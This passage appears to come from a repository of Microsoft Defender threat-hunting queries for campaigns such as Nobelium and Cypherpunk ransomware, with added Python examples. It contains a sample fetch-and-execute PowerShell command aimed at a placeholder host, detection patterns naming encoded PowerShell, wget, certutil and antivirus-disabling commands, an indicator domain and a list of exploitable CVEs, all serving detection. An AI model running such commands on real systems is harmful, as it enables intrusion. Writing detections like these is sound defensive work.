| where ProcessCommandLine matches regex '[A-Za-z0-9+/]{50,}[=]{0,2}'
// Exclusions: The above regex may trigger false positive on legitimate SCCM activities.
// Remove this exclusion to search more broadly.
| where ProcessCommandLine !has 'Windows\\CCM\\'
| project DeviceId, Timestamp, InitiatingProcessId,
InitiatingProcessFileName, ProcessId, FileName, ProcessCommandLine
```
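As an added illustration that is not code from this repository, the following Python reproduces the query's filters over a few constructed `DeviceProcessEvents`-style rows and then decodes the `-EncodedCommand` operand, which PowerShell expects as Base64 of UTF-16LE text rather than UTF-8. The KQL operators `=~`, `hasprefix` and `!has` are approximated in plain Python; the device IDs, command lines and the payload's host name are made up.

```python
import base64
import re
from typing import Iterable, List, Optional, Tuple

# The query's Base64 test: a run of 50+ Base64 characters with optional padding.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{50,}={0,2}")

# powershell.exe accepts -EncodedCommand and its unambiguous prefixes (-e, -ec, -en, -enc ...).
# The operand is Base64 of the script encoded as UTF-16LE.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]+)")


def looks_like_encoded_powershell(event: dict) -> bool:
    """Apply the hunting query's filters to one DeviceProcessEvents-shaped row.

    KQL =~ is case-insensitive equality; 'hasprefix "-e"' and '!has' are term-based
    and are approximated with whitespace-split terms and a substring test.
    """
    if event["InitiatingProcessFileName"].lower() != "wmiprvse.exe":
        return False  # only WMI-initiated instances, as in the query
    if event["FileName"].lower() != "powershell.exe":
        return False
    cmd = event["ProcessCommandLine"]
    low = cmd.lower()
    has_e_prefix = any(term.startswith("-e") for term in low.split())
    if not (has_e_prefix or "frombase64" in low):
        return False
    if not BASE64_RUN.search(cmd):
        return False
    # Exclusion: SCCM client scripts live under Windows\CCM\ and would otherwise match.
    if "windows\\ccm\\" in low:
        return False
    return True


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand, or None if no operand decodes."""
    for m in ENC_FLAG.finditer(cmd):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def hunt(events: Iterable[dict]) -> List[Tuple[str, Optional[str]]]:
    """Return (DeviceId, decoded script) for every row the query would surface."""
    return [
        (e["DeviceId"], decode_encoded_command(e["ProcessCommandLine"]))
        for e in events
        if looks_like_encoded_powershell(e)
    ]


# Constructed sample rows (not real telemetry). The host name is a reserved example domain.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # WMI-spawned encoded PowerShell: the behaviour the query hunts for
        "DeviceId": "dev-01", "InitiatingProcessFileName": "WmiPrvSE.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": f"powershell.exe -NoP -W Hidden -e {ENCODED}",
    },
    {   # SCCM client script: -ExecutionPolicy starts with -e and the script name is a
        # long alphanumeric run, so only the Windows\CCM\ exclusion keeps it quiet
        "DeviceId": "dev-02", "InitiatingProcessFileName": "wmiprvse.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -NoProfile -File "
                              "C:\\Windows\\CCM\\SystemTemp\\" + "Ab3" * 18 + ".ps1",
    },
    {   # Same encoded command launched from Explorer: outside the query's WMI scope
        "DeviceId": "dev-03", "InitiatingProcessFileName": "explorer.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": f"powershell.exe -e {ENCODED}",
    },
    {   # WMI-spawned but plain-text command: no Base64 run
        "DeviceId": "dev-04", "InitiatingProcessFileName": "wmiprvse.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": "powershell.exe -Command Get-Process",
    },
]

if __name__ == "__main__":
    for device, script in hunt(SAMPLE_EVENTS):
        print(device, "->", script)
```

Only `dev-02`'s row shows why the SCCM exclusion is in the query: `-ExecutionPolicy` satisfies the `-e` prefix test and a long script name satisfies the Base64 regex, so dropping the exclusion to hunt more broadly (as the query's comment suggests) will bring such rows back and they need to be triaged by path rather than by command-line shape.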
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Detect PsExec being used to spread files](../Lateral%20Movement/remote-file-creation-with-psexec.md)
* [Detect credential theft via SAM database export by LaZagne](../Credential%20Access/lazagne.md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/compromised-certificate[Nobelium].md
================================================
# Compromised certificate [Nobelium]
Search for files signed with a compromised certificate associated with the Nobelium campaign.
Uncomment one of the trailing lines to:
* list the devices with at least one file signed with the certificate
* list the files signed with the certificate
* list the files signed with the certificate, grouped by device
## Query
```Kusto
DeviceFileCertificateInfo
| where Signer == 'Solarwinds Worldwide, LLC' and SignerHash == '47d92d49e6f7f296260da1af355f941eb25360c4'
| join DeviceFileEvents on SHA1
| distinct DeviceName, FileName, FolderPath, SHA1, SHA256, IsTrusted, IsRootSignerMicrosoft, SignerHash
//| distinct DeviceName
//| distinct FileName
//| summarize mylist = make_list(FileName) by DeviceName
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Dario Brambilla
**GitHub alias:** darioongit
**Organization:** Microsoft 365 Defender
================================================
FILE: Campaigns/confluence-weblogic-targeted.md
================================================
# Confluence and WebLogic servers targeted by campaign
This query was originally published in the threat analytics report, *Confluence and WebLogic abuse*.
2019 has seen several seemingly related campaigns targeting Atlassian Confluence Server and Oracle WebLogic Server. Although these campaigns use different implants and delivery methods, they consistently use the same infrastructure, and exploit the same vulnerabilities.
The campaigns have specifically targeted:
* [CVE-2019-3396](https://nvd.nist.gov/vuln/detail/CVE-2019-3396) - [Software update](https://jira.atlassian.com/browse/CONFSERVER-57974)
* [CVE-2019-2725](https://nvd.nist.gov/vuln/detail/CVE-2019-2725) - [Software update](https://www.oracle.com/security-alerts/alert-cve-2019-2725.html)
The following query detects activity broadly associated with these campaigns.
## Query
```Kusto
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where
// "Grandparent" process is Oracle WebLogic or some process loading Confluence
InitiatingProcessParentFileName == "beasvc.exe" or
InitiatingProcessFileName == "beasvc.exe"
or InitiatingProcessCommandLine contains "//confluence"
// Calculate for Base64 in Commandline
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total)
| where
(
FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned
// Omit known clean processes
and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
and ProcessCommandLine !contains "ApplicationNo"
and ProcessCommandLine !contains "CustomerGroup"
and ProcessCommandLine !contains "Cosmos"
and ProcessCommandLine !contains "Unrestricted"
and
(
ProcessCommandLine contains "$" // PowerShell variable declaration
or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
or ProcessCommandLine contains "encodedcommand"
or ProcessCommandLine contains "wget"
//or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
)
)
or
(
FileName =~ "cmd.exe" // cmd.exe is spawned
and ProcessCommandLine contains "@echo" and
ProcessCommandLine contains ">" // Echoing commands into a file
)
or
(
FileName =~ "certutil.exe" // CertUtil.exe abuse
and ProcessCommandLine contains "-split"
// the "-split" parameter is required to write files to the disk
)
| project
Timestamp,
InitiatingProcessCreationTime ,
DeviceId ,
Grandparent_PID = InitiatingProcessParentId,
Grandparent = InitiatingProcessParentFileName,
Parent_Account = InitiatingProcessAccountName,
Parent_PID = InitiatingProcessId,
Parent = InitiatingProcessFileName ,
Parent_Commandline = InitiatingProcessCommandLine,
Child_PID = ProcessId,
Child = FileName ,
Child_Commandline = ProcessCommandLine
```
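The `Caps`/`Total` ratio is the query's commented-out Base64 heuristic. As an added example that is not part of the repository, this Python computes the ratio the way the two `countof()` calls do and shows why the band is disabled by default: an all-uppercase management command lands in the same band as an encoded command, which is exactly what the query's first `!startswith` exclusion removes. The three command lines are constructed; the Base64 blob is computed from the string `Get-Process`.

```python
import base64
import re
from typing import Iterable, List, Tuple


def base64_ratio(cmdline: str) -> float:
    """The query's Caps/Total: countof("[A-Z]") over countof(".") in regex mode."""
    total = len(re.findall(r".", cmdline))  # "." does not count newlines, like countof
    caps = len(re.findall(r"[A-Z]", cmdline))
    return caps / total if total else 0.0


def in_base64_band(cmdline: str, low: float = 0.4, high: float = 1.0) -> bool:
    """The commented-out test from the query: 0.4 < Ratio < 1.0."""
    return low < base64_ratio(cmdline) < high


def is_known_clean(cmdline: str) -> bool:
    """The query's first exclusion; KQL !startswith is case-insensitive."""
    return cmdline.upper().startswith('POWERSHELL.EXE -C "GET-WMIOBJECT -COMPUTERNAME')


def triage(cmdlines: Iterable[str]) -> List[Tuple[str, float, bool]]:
    """(command line, ratio, flagged) with the band applied after the exclusion."""
    return [
        (c, base64_ratio(c), in_base64_band(c) and not is_known_clean(c))
        for c in cmdlines
    ]


# Constructed command lines (not telemetry from the report).
BLOB = base64.b64encode("Get-Process".encode("utf-16-le")).decode("ascii")  # RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==
PLAIN = "powershell.exe -Command Get-Process"                              # 3 uppercase of 35 chars
ENC_CMD = "powershell.exe -e " + BLOB                                      # 22 uppercase of 50 chars
SHOUTING = 'POWERSHELL.EXE -C "GET-WMIOBJECT -COMPUTERNAME localhost"'     # 38 uppercase of 57 chars

if __name__ == "__main__":
    for cmd, ratio, flagged in triage([PLAIN, ENC_CMD, SHOUTING]):
        print(f"{ratio:.2f} {'FLAG' if flagged else '    '} {cmd}")
```

The encoded command sits at 0.44, barely inside the band, because UTF-16LE text Base64-encodes to a blob rich in uppercase `A`s; a longer prefix such as `-EncodedCommand` pushes the same payload below 0.4. The ratio is therefore a supporting signal for the stricter tests in the query, not a filter on its own.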
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/cypherpunk-exclusive-commands.md
================================================
# Cypherpunk remote execution through PSEXESVC
This query was originally published in the threat analytics report, *Cypherpunk ransomware leaves wake of tampered AVs*.
Cypherpunk is a human-operated ransomware campaign named after the unusual *.cypherpunk* extension given to encrypted files.
The query below surfaces commands that follow the distinctive pattern Cypherpunk operators would use to remotely execute code.
## Query
```kusto
// Searches for possible Cypherpunk ransomware activity
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith "psexe"
| where ProcessCommandLine has "Dvr /go"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/cypherpunk-remote-exec-w-psexesvc.md
================================================
# Cypherpunk remote execution through PSEXESVC
This query was originally published in the threat analytics report, *Cypherpunk ransomware leaves wake of tampered AVs*.
Cypherpunk is a human-operated ransomware campaign named after the unusual *.cypherpunk* extension given to encrypted files. The attackers often used PSEXESVC, the service that the Sysinternals PsExec.exe utility installs on a remote device in order to run commands there. Both PSEXESVC and PsExec.exe are legitimate components of the Microsoft Sysinternals PsExec tool rather than malware; however, they can be repurposed by attackers to perform malicious actions.
The query below finds instances of PSEXESVC launching a batch file that in turn runs a command containing `DisableIOAVProtection`, the Microsoft Defender Antivirus preference that turns off scanning of downloaded files and attachments, as often occurred in Cypherpunk attacks.
## Query
```kusto
// Searches for remote batch file launch using PSEXESVC.exe
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith "psexe"
| where InitiatingProcessCommandLine has ".bat"
| where ProcessCommandLine has "DisableIOAVProtection"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/detect-cyzfc-activity.md
================================================
# Detect activity associated with malicious DLL, cyzfc.dat
These queries were originally published in the threat analytics report, *Attacks on gov't, think tanks, NGOs*.
As described further in *[Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/)*, there was a very large spear-phishing campaign launched in November 2018.
The attackers would gain access to a target by having the user click on a link to a compromised website and download a .zip archive.
Once established on a target's device, the attackers used a malicious DLL named *cyzfc.dat* to execute additional payloads. They would call a function in the malicious DLL via the legitimate Windows process, [rundll32.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32), to connect directly to their command-and-control (C2) servers.
The following queries detect activity associated with the malicious DLL, *cyzfc.dat*, used in this campaign. Run each numbered query on its own; they are independent.
## Query
```Kusto
// Run each numbered query separately; they are independent and each declares its own variables.
// Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents,
DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where Timestamp > ago(10d)
// Query 2: C2 connection
DeviceNetworkEvents
| where Timestamp > ago(10d)
| where RemoteUrl == "pandorasong.com"
// Query 3: Malicious PowerShell
DeviceProcessEvents
| where Timestamp > ago(10d)
| where ProcessCommandLine contains
"-noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJ"
// Query 4: Malicious domain in default browser commandline
DeviceProcessEvents
| where Timestamp > ago(10d)
| where ProcessCommandLine contains
"https://www.jmj.com/personal/nauerthn_state_gov"
// Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents,
DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where Timestamp > ago(10d)
```
## Category
These queries can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/fireeye-red-team-tools-CVEs [Nobelium].md
================================================
# FireEye Red Team tool CVEs [Nobelium]
This query searches Threat and Vulnerability Management (TVM) data for the CVEs that should be prioritized and resolved to reduce the success of the FireEye Red Team tools compromised by the Nobelium activity group.
See [red_team_tool_countermeasures](https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md) on the [official FireEye repo](https://github.com/fireeye).
## Query
```Kusto
let FireEyeCVE= dynamic(
[
"CVE-2019-11510", //pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0
"CVE-2020-1472", //Microsoft Active Directory escalation of privileges - CVSS 10.0
"CVE-2018-13379", //pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN - CVSS 9.8 // CVE not found
"CVE-2018-15961", //RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell) - CVSS 9.8
"CVE-2019-0604", //RCE for Microsoft Sharepoint - CVSS 9.8
"CVE-2019-0708", //RCE of Windows Remote Desktop Services (RDS) - CVSS 9.8
"CVE-2019-11580", //Atlassian Crowd Remote Code Execution - CVSS 9.8
"CVE-2019-19781", //RCE of Citrix Application Delivery Controller and Citrix Gateway - CVSS 9.8 // CVE not found
"CVE-2020-10189", //RCE for ZoHo ManageEngine Desktop Central - CVSS 9.8
"CVE-2014-1812", //Windows Local Privilege Escalation - CVSS 9.0
"CVE-2019-3398", //Confluence Authenticated Remote Code Execution - CVSS 8.8
"CVE-2020-0688", //Remote Command Execution in Microsoft Exchange - CVSS 8.8
"CVE-2016-0167", //local privilege escalation on older versions of Microsoft Windows - CVSS 7.8
"CVE-2017-11774", //RCE in Microsoft Outlook via crafted document execution (phishing) - CVSS 7.8
"CVE-2018-8581", //Microsoft Exchange Server escalation of privileges - CVSS 7.4
"CVE-2019-8394" //arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus - CVSS 6.5
]
);
DeviceTvmSoftwareVulnerabilitiesKB
| where CveId in(FireEyeCVE)
| join DeviceTvmSoftwareVulnerabilities on CveId
| project-away CveId1, VulnerabilitySeverityLevel1, AffectedSoftware
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Dario Brambilla
**GitHub alias:** darioongit
**Organization:** Microsoft 365 Defender
================================================
FILE: Campaigns/fireeye-red-team-tools-HASHs [Nobelium].md
================================================
# FireEye Red Team tool HASHs [Nobelium]
This query searches file and image-load events for the hashes (MD5, SHA1 and SHA256) of the FireEye Red Team tools compromised by the Nobelium activity group.
See [all-hashes.csv](https://github.com/fireeye/red_team_tool_countermeasures/blob/master/all-hashes.csv) on the [official FireEye repo](https://github.com/fireeye).
## Query
```Kusto
let MD5Hash= dynamic(
[
'013c7708f1343d684e3571453261b586',
'01d68343ac46db6065f888a094edfe4f',
'04eb45f8546e052fe348fda2425b058c',
'05b99d438dac63a5a993cea37c036673',
'09bdbad8358b04994e2c04bb26a160ef',
'0a86d64c3b25aa45428e94b6e0be3e08',
'0b1e512afe24c31531d6db6b47bac8ee',
'100d73b35f23b2fe84bf7cd37140bf4d',
'11b5aceb428c3e8c61ed24a8ca50553e',
'12c3566761495b8353f67298f15b882c',
'150224a0ccabce79f963795bf29ec75b',
'152fc2320790aa16ef9b6126f47c3cca',
'226b1ac427eb5a4dc2a00cc72c163214',
'2398ed2d5b830d226af26dedaf30f64a',
'24a7c99da9eef1c58f09cf09b9744d7b',
'25a97f6dba87ef9906a62c1a305ee1dd',
'294b1e229c3b1efce29b162e7b3be0ab',
'2b686a8b83f8e1d8b455976ae70dab6e',
'2e67c62bd0307c04af469ee8dcb220f2',
'3322fba40c4de7e3de0fda1123b0bf5d',
'3651f252d53d2f46040652788499d65a',
'383161e4deaf7eb2ebeda2c5e9c3204c',
'3b926b5762e13ceec7ac3a61e85c93bb',
'3bb34ebd93b8ab5799f4843e8cc829fa',
'3e61ca5057633459e96897f79970a46d',
'3fb9341fb11eca439b50121c6f7c59c7',
'4022baddfda3858a57c9cbb0d49f6f86',
'4326a7e863928ffbb5f6bdf63bb9126e',
'4410e95de247d7f1ab649aa640ee86fb',
'4414953fa397a41156f6fa4f9462d207',
'4456e52f6f8543c3ba76cb25ea3e9bd2',
'44887551a47ae272d7873a354d24042d',
'45736deb14f3a68e88b038183c23e597',
'4bf96a7040a683bd34c618431e571e26',
'4e7e90c7147ee8aa01275894734f4492',
'4fd62068e591cbd6f413e1c2b8f75442',
'5125979110847d35a338caac6bff2aa8',
'562ecbba043552d59a0f23f61cea0983',
'590d98bb74879b52b97d8a158af912af',
'5e14f77f85fd9a5be46e7f04b8a144f5',
'66cdaa156e4d372cfa3dea0137850d20',
'66e0681a500c726ed52e5ea9423d2654',
'68acf11f5e456744262ff31beae58526',
'6902862bd81da402e7ac70856afbe6a2',
'6a9a114928554c26675884eeb40cc01b',
'6efb58cf54d1bb45c057efcfbbd68a93',
'6f04a93753ae3ae043203437832363c4',
'79259451ff47b864d71fb3f94b1774f3',
'7af24305a409a2b8f83ece27bb0f7900',
'7c2a06ceb29cdb25f24c06f2a8892fba',
'7e6bc0ed11c2532b2ae7060327457812',
'7f8102b789303b7861a03290c79feba0',
'8025bcbe3cc81fc19021ad0fbc11cf9b',
'82773afa0860d668d7fe40e3f22b0f3e',
'82e33011ac34adfcced6cddc8ea56a81',
'83ed748cd94576700268d35666bf3e01',
'848837b83865f3854801be1f25cb9f4d',
'8c91a27bbdbe9fb0877daccd28bd7bb5',
'8d949c34def898f0f32544e43117c057',
'9529c4c9773392893a8a0ab8ce8f8ce1',
'98ecf58d48a3eae43899b45cec0fc6b7',
'995120b35db9d2f36d7d0ae0bfc9c10d',
'9c8eb908b8c1cda46e844c24f65d9370',
'9ccda4d7511009d5572ef2f8597fba4e',
'9dcb6424662941d746576e62712220aa',
'9e85713d615bda23785faf660c1b872c',
'9f401176a9dd18fa2b5b90b4a2aa1356',
'a107850eb20a4bb3cc59dbd6861eaf0f',
'a495c6d11ff3f525915345fb762f8047',
'a8b5dcfea5e87bf0e95176daa243943d',
'a91bf61cc18705be2288a0f6f125068f',
'aeb0e1d0e71ce2a08db9b1e5fb98e0aa',
'b66347ef110e60b064474ae746701d4a',
'b8415b4056c10c15da5bba4826a44ffd',
'c0598321d4ad4cf1219cc4f84bad4094',
'c74ebb6c238bbfaefd5b32d2bf7c7fcc',
'cdf58a48757010d9891c62940c439adb',
'cf752e9cd2eccbda5b8e4c29ab5554b6',
'd0a830403e56ebaa4bfbe87dbfdee44f',
'd5d3d23c8573d999f1c48d3e211b1066',
